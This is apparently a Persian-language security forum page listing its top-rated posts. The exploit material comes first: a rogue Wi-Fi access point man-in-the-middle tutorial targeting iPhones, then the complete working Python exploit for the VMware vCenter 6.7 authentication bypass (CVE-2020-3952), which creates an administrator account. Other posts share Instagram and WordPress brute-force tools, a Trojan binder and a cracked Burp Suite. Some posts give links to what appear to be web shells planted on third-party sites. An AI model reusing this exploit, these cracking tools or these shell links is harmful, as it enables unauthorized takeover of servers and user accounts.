رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تخته امتیازات


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۲۰/۰۶/۰۷ در همه بخش ها

  1. 5 امتیاز
    در این سناریو فرد مهاجم توانایی انجام یك حمله MITM بر روی برنامه تلفن همراه آسیب پذیر و سرور پیاده سازی شده را دارد و در ادامه می تواند Rogue Access Point (یا Rogue AP) دلخواه خود را پیکربندی کند. Rogue AP محدوده آنتن دهی شبکه های بی سیم است که شخص مهاجم می تواند بدون دخالت مدیر یا مسئول شبکه با استفاده از دستگاه های بی سیم مورد نظر خود، دسترسی غیرمجاز به زیرساخت های سیم کشی شبکه را برای خود فراهم کند. مهاجم یا مهاجمان می توانند یک شبکه WiFi عمومی (Rogue AP) را در مکانی راه اندازی کنند که افراد زیادی در آنجا از خدمات این گونه زیر ساخت ها استفاده می کنند مانند کافی شاپ یا فرودگاه و ... مهاجم می تواند با استفاده از نام های جعلی مانند "MainStCafe_FreeWiFi" یا "Wi-Fi-Free-Airport" کاربران و مشتریان را فریب داده و ظاهر مشروع به خود بگیرد. متأسفانه اکثر مردم از خطرات اتصال به شبکه های عمومی نا امن آگاه نیستند و به راحتی می توانند در این فرآیند اتصال جعلی فریب بخورند. پس از طی این فرآیندها، مهاجم می تواند ترافیک تلفن شخص قربانی را جمع آوری، رهگیری و ویرایش کند. هنگامی که شخص قربانی در حال مرور صفحه وب می باشد، احتمالاً با اخطاری نظیر عدم احراز هویت روبرو می شود . مرورگرهای وب با استفاده از پروتکل HTTPS قادر به مسدود سازی یا هشدار هستند (اغلب کاربران این خطاها را نادیده می گیرند و بدون فکر روی ‘Continue Anyway’ کلیک می کنند) اما برنامه های دستگاه های iOS می توانند به سادگی از ارسال ترافیک در این سناریوهای مخرب امتناع خودداری کنند. با این حال در برخی موارد ممکن است مهاجم بتواند ترافیک رمز نشده HTTPS را از تلفن قربانی رهگیری کند. همه ما می دانیم که نصب و راه اندازی گواهی CA امری ضروری است و برای ایمن ماندن باید چگونگی اجرای درست SSL را بدانیم. در ادامه با ما همراه باشید .... در این قسمت قصد داریم این تست را روی دستگاه های IOS انجام بدیم. 1. نصب internet Sharing مسیر مورد نظر در مک ==> System Preferences > Sharing’ طبق عکس internet sharing رو جست و جو کرده و تیک آن را بزنید. و سپس وای فای را به رایانه ای که از آن استفاده می کنید وصل کنید. 2. نصب Port Forwarding برای ساخت Port Forwarding ابتدا باید آی پی خودمان را با زدن دستور ifconfig پیدا کنیم. که ای پی من به شکله 192.168.2.1 است. نیاز داریم یک فایل Anchor ایجاد کنیم. با زدن دستور زیر می توانیم فایل را ایجاد کنیم. sudo vi /etc/pf.anchors/rogue متن های زیر را داخل فایلی که ساخته ایم قرار بدین. به جای bridge100 اسم interface خودتان را قرار بدین. rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port http -> 127.0.0.1 port 8080 rdr pass on bridge100 inet proto tcp from 192.168.2.0/24 to any port https -> 127.0.0.1 port 8080 در آخر نیاز داریم فایل جدیدمان را به عنوان کانفیگ دیفالت portforwarding معرفی کنیم. ابتدا فایل کانفیگ را با دستور زیر باز میکنیم. sudo vi /etc/pf.conf نیاز دارید 2 خط کد به این فایل اضافه کنید که به ترتیب زیر قرار دهید. rdr-anchor "rogue" load anchor "rogue" from "/etc/pf.anchors/rogue" این کانفیگ ها را به اخرین خط فایل کانفیگتان اضافه کنین. وقتی ترافیک AccessPoint را به سمت BUrpsuite فروارد کردیم، Burp تلاش می کند حمله MITM را انجام دهد. بعد از راه اندازی burpsuite، به قسمت پروکسی رفته و طبق تصویر پروکسی را راه اندازی کنید. 3. اکسپلویت در آیفون، شما باید بتوانید به وای فای جدید متصل شین. قبل از هرچیزی اگر قبلا Port Swigger CA را نصب کرده بودید آن را از دستگاه خودتان حذف کنین. وقتی در گوشی ایفون خود وبسایتی باز کنین و وب گردی کنین می توانین اطلاعات رهگیری و جمع آوری شده خودتان را در Burpsuite ببینین.
  2. 4 امتیاز
    آسیب پذیری از Vmware vCenter : VMware vCenter Server 6.7 - Authentication Bypass چندی پیش آسیب پذیری از Vmware vCenter ورژن 6.7 کشف و اعلام شد . با بهره از این آسیب پذیری امکان دورزدن احراز هویت ( Authentication Bypass ) در Vmware vCenter Server میباشد. دراصطلاح هکر با قادر است یک حساب کاربری با سطح دسترسی Administrator اضافه کند و علت این آسیب پذیری که حساس هم هست دو دلیل داره : 1- خطا و ایراد در سیستم بررسی سطح درسترسی ها و مجوزها 2- خطا در LDAP که امکان و مجوز بدون احرازهویت را میدهد. V 6.7 : # Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()
  3. 3 امتیاز
    سلام , اگر سامسونگ اکانت ساخته باشی و به نت وصل باشه خیلی راحت میتونی برداری پترن رو علاوه بر Pattren , پسورد هم یادتون رفته؟!
  4. 2 امتیاز
    سلام از رزبری پای چند استفاده میکنید چه سیستم عاملی ؟
  5. 2 امتیاز
    سلام سورس برنامه رو میزارم شاید به کارتون بخوره رمز عبور منوی ثبت کتاب منوی لیست کتاب مدیریت اعضا منوی کاربری فرم ثبت امانات تحویل کتاب گزارشات Library_Project.rar
  6. 2 امتیاز
    با سلام خدمت دوستان عزیز دوستانی که در زمینه یوتوب و شبکه های اجتماعی فعالیت می کنند این کورس بدردشون می خوره... https://mega.nz/folder/uV5DHYDJ#w6tYnER3xwcMj1UfKQBqfg موفق باشید🤤
  7. 2 امتیاز
    سلام نسخه ی جدید 1.7.33 نرم افزار ‌BrupSuite همراه با کرک سالم منتشر شد. Brup Suite : ابزاری قدتمند جهت تست امنیت وبسایتها است. ابزارهای کمی وجود دارند که بتوانند تمامی تستهای مورد نیاز برای سنجش میزان نفوذ پذیری یک وبسایت را انجام دهند. این برنامه ادعا میکند که قادر است تمامی انواع تستها از آنالیزهای اولیه گرفته تا پیدا کردن نقاط ضعف و اکسپلویت نویسی را میتواند در این برنامه یه صورت یکپارچه و در کنار هم انجام دهد. این ویژگی باعث میشود تا برای تست هر مورد به سراغ برنامه های مجزا نروید. بخش اعظم تستهای این برنامه به صورت خودکار انجام میشود و با دریافت حداقل اطلاعات حداکثر نتایج به شما نشان داده خواهد شد. به علت وجود بدافزار حذف شد! لینک اسکن VirusTotal 0/52
  8. 1 امتیاز
    به نام خداوند بخشنده مهربان سلام و عرض ادب خدمت کاربران, امیدوارم طاعات و عباداتتون قبول درگاه حق باشه ابزاری به درخواست دوستان آماده کردم برای انجام دادن حملات BruteForce بر بروی سایت Instagram برخی قابلیت های برنامه : سرعت بسیار بالا درصد اشتباه بسیار پایین به صورت کمبولیست کار میکنه نیاز به پروکسی داره پشتیبانی کامل از پایتون نسخه 2 multi thread ویدیویی آماده کردم تا با سرعت و نحوی عملکرد برنامه بهتر آشنا بشید [MEDIA=aparat]IGX4i[/MEDIA] link Project https://github.com/04x/instagramCracker یک فایل proxychecker.py هم کنار اسکریپت گذاشتم قبل از شروع کرک حتما پروکسی های سالم رو جدا کنید!
  9. 1 امتیاز
    با سلام Pw : IRan-cyber.Net ICG™ BlogspotCracker.rar
  10. 1 امتیاز
    سلام. من یه رزبری پای دارم که به عنوان یه سرور خانگی ازش استفاده میکنم.روش رزبین نصبه.دیشب متوجه شدم که نمیتونم با vnc واردش بشم. و پیغام میداد پسوردش اشتباهه. امروز فایل لاگ autth.log رو خوندم و متوجه شدم با آی پی چین یه روز بوده منو اسکن میکردن که نهایتا وارد سیستمم شدن.خودشم با پسورد root😉 حالا میخوام بدونم چطور باید بفهمم چه کارایی رو سیستمم انجام دادن.چه تغییراتی رو سیستمم انجام دادن و...آیا فایلی کپی کردن رو سیستمم یا از سیستمم برداشتن.؟
  11. 1 امتیاز
    سلام وقتتون بخیر دوستان من یه گوشی سامسونگ A20S دارم حالا الگو رو فراموش کردم راهی هست که بتونم بازش کنم؟
  12. 1 امتیاز
    @Reza.Black سلام میشه یک پست در رابطه با کلیه مباحث فازینگ بصورت جامع قرار دهید؟
  13. 1 امتیاز
    به نام خدای بزرگ با سلام seh یا Structured Exception Handler یک نوع مکانیزم دفاعی برای جلوگیری از حملات overflow هست. زمانی که ما در مرحله ی فازینگ اپلیکیشن قرار داریم یا بهتر بگم در برنامه شکست ایجاد می کنیم. در واقع یک استثنا ایجاد کردیم چون که برنامه انتظار چنین رفتاری رو از قبل نداشت. یا دقیق تر بگم برنامه نویس پیش بینی های لازم امنیتی رو رعایت نکرد. مکانیزم دفاعی seh مانع از ایجاد اینگونه استثناها میشه. برای اینکه موضوع بیشتر قابل درک باشه یه تست ساده با هم انجام میدیم. من از برنامه ی معروف easy chat server برای این کار استفاده می کنم که از این مکانیزم استفاده می کنه. و مناسب کارهای تستی هست و در ورژن های گوناگونی هم وجود داره. حالا یه تیکه کد ساده به زبان روبی برای انجام فازینگ استفاده می کنیم. پروسه ی اجرایی برنامه رو به دیباگر Immunity متصل می کنم. حالا کد خودمون رو اجرا می کنیم. یه نگاه به رجیسترها به خصوص eip می کنم تا ببینم اتفاقی افتاده یا نه؟ همونطور که می بینید seh مانع از رونویسی این رجیستر شده و در واقع اون رو در حافظه ی مجازی خودش ذخیره کرده. که حد فاصل اون تا حافظه ی واقعی خود برنامه 4 بیت یا یک nible هست. البته راههای دور زدن این مکانیزم متعدد هست چون که بالاخره هر چیزی در حافظه دارای یک آدرس و یک نقطه ی ورود هست. (خوشحال میشم از نظرات دوستان استفاده کنم.)
  14. 1 امتیاز
    با عرض احترام تشکر بابت مطالب مفیدتون لطف میکنید تمامی ابزار و کد هایی که بصورت Screen قرار دادید اگر فایل هستند پیوست کنید و یا از تگ کد استفاده کنید؟ و اگر لازم هست بخشی مبنی بر فازینگ و ... در انجمن لحاض گردد بصورت پیام خصوصی در ارتباط باشید.
  15. 1 امتیاز
    http://demo.turismodalcahue.cl/IR.php http://turismodalcahue.cl/uploads/IR.php
  16. 1 امتیاز
    با سلام Local Area Connection Wifi Wired Ethemet Connection Kerio Virtul Network Pw : IRan-cyber.net ICG™ IP Changer.rar
  17. 1 امتیاز
    با سلام Pw:IRan-cyber.net ICG™ Trojan Binder.rar
  18. 1 امتیاز
    با سلام ممنون از نظرتون چشم در ورژن 2 حتما لحاظ میکنم
  19. 1 امتیاز
    ICG™ Port Scanner v1 Pw : IRan-cyber.net ICG™ Port Scanner.rar
  20. 1 امتیاز
    با سلام Pw :IRan-cyber.net ICG™ String Function.rar
  21. 1 امتیاز
    http://b34.cn/wp-content/uploads/IR.php http://ccqqq.com/wp-content/uploads/IR.php http://pete.cn/zb_users/upload/IR.php
  22. 1 امتیاز
    ICG™ Wordpress BruteForcer V1 در اين ورژن شما بايد يوزر ادمين سايت را خودتان پيدا کنيد. Pw : IRan-cyber.net ICG™ Wordpress BruteForcer.rar
  23. 1 امتیاز
    سلام خدمت دوستان عزیز , ویدئویی برای دوستان اماده کردیم که در این ویدئو با استفاده از دستور ln -s فایل مورد نظرمون رو symlink میزنیم . در این ویدئو به پرداخته شده است. : 1-نحوه symlink زدن فایل مورد نظر با استفاده از functions پی اچ پی و اجرای command مورد نظر 1- نحوه بایپس Functions , زمانی که دستورات run و اجرا نمیشوند . 3-بایپس اررور Forbidden 4-... کیفیت فیلم : عالی حجم اصلی حدود 300 MB لینک دانلود : http://www.4shared.com/get/RbDQu0HUba/vokoscreen-2015-08-30_12-49-40.html
  24. 1 امتیاز
    در این قسمت با بایپس دیگر اشنا خواهید شد http://s3.picofile.com/file/8220284984/bypass_Frobidden_.rar.html ./
  25. 1 امتیاز
    سلامی دیگر سعی میکنم تموم فیلم با متود های جدید بایپس برای دوستان رکورد کنم در این بایپس با ارور های Forbidden و Internal Server Error اشنا خواهید شد http://s6.picofile.com/file/8216274600/bypass_Forbidden.zip.html ./

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...